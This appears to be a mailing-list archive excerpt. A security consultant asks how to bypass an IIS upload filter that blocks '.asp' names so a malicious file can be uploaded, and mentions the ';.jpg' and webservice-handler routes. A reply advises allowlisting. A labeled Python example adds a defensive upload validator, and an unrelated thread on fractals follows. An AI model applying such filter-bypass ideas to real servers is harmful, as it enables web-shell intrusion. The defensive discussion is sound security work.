You shouldn't filter against known files, but do the reverse, you should filter against known good files. Oh and the medium you decide to throw this data should have special checks against execution etc... On Fri, Jun 24, 2011 at 6:16 PM, Nahuel Grisolia nah...@bonsai-sec.com wrote: List, Imagine that you're in front of an insecure file upload in the context of an IIS6,7 (no ;.jpg :P) and the regex filtering the file is like: [anything].asp[anything] (yeah, my.aspirator.jpg is filtered hehe) No .aspx, no .asp and no .aspx;jpg even if the server is vulnerable... So... is there any way to bypass this control? Like uploading a malicious Webservice (can we simply upload a Webservice file? I think they need to be precompiled first) or something like that? Thanks a lot! regards, -- Nahuel Grisolia - C|EH Information Security Consultant Bonsai Information Security Project Leader http://www.bonsai-sec.com/ (+54-11) 4777-3107
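Added example (not part of the thread): the denylist described in the question beside a known-good filter of the kind the reply recommends, in Python. The exact regex, the allowed types, the sample files and the function names are assumptions constructed for this illustration; the storage directory is assumed to sit outside the web root or to have script execution disabled.

```python
import os
import re
import secrets
import tempfile

# The filter as described in the question: reject [anything].asp[anything].
# The exact regex is an assumption.
DENYLIST = re.compile(r"\.asp", re.IGNORECASE)

# Hypothetical allowlist: extension -> magic bytes the content must start with.
ALLOWED = {
    ".jpg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


class UploadRejected(ValueError):
    """Raised when an upload is not a known-good file type."""


def denylist_accepts(filename):
    return DENYLIST.search(filename) is None


def allowlist_extension(filename, data):
    """Return the extension if both name and content are known good."""
    base = os.path.basename(filename.replace("\\", "/"))
    # ';' (the ';.jpg' handling the question alludes to), ':' and NUL never
    # occur in the names this policy expects, so they are refused outright.
    if not base or any(ch in base for ch in ";:\x00"):
        raise UploadRejected("unexpected character in file name")
    ext = os.path.splitext(base)[1].lower()
    magics = ALLOWED.get(ext)
    if magics is None:
        raise UploadRejected("extension %r is not on the allowlist" % ext)
    if not data.startswith(magics):
        raise UploadRejected("content does not look like %s" % ext)
    return ext


def store_upload(filename, data, upload_dir):
    """Validate, then write under a server-chosen name with no execute bits."""
    ext = allowlist_extension(filename, data)
    stored = secrets.token_hex(16) + ext      # the client's name is never reused
    fd = os.open(os.path.join(upload_dir, stored),
                 os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return stored


JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16     # constructed stand-in for image data
SAMPLES = [                                   # constructed upload attempts
    ("holiday.jpg", JPEG),
    ("my.aspirator.jpg", JPEG),
    ("page.aspx", b"not an image"),
    ("handler.ashx", b"not an image"),
    ("service.asmx", b"not an image"),
    ("photo.jpg", b"not an image"),
]


def compare(samples=SAMPLES):
    """Return (name, denylist_accepts, allowlist_accepts) for each sample."""
    rows = []
    with tempfile.TemporaryDirectory() as upload_dir:
        for name, data in samples:
            try:
                store_upload(name, data, upload_dir)
                accepted = True
            except UploadRejected:
                accepted = False
            rows.append((name, denylist_accepts(name), accepted))
    return rows


if __name__ == "__main__":
    for name, deny_ok, allow_ok in compare():
        print("%-18s denylist=%-5s allowlist=%s" % (name, deny_ok, allow_ok))
```
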
Re: [Full-disclosure] (fractal-Self__) : A theoretical introduction to Universe, Conscious Machines and Programming Ur-cells !!!
Fractal fractal fractal, even us that coined the concept can't keep it going forever. Seems evident that each subsystem loses key aspects of its parent, this might turn out to be a system flaw, or a constrained space. We might have discovered this flaw already and we might have been using all this time since nothing tells us the laws of our universe are true to its container (if at all). Chris. On Sun, Jun 12, 2011 at 10:13 PM, Michal Zalewski lcam...@coredump.cx wrote: Paradox are way of life... Hence, the goal here is to question every knowledge with reasoning and trying-not to build a static opinion on anything. But have you tried contacting the vendor first? /mz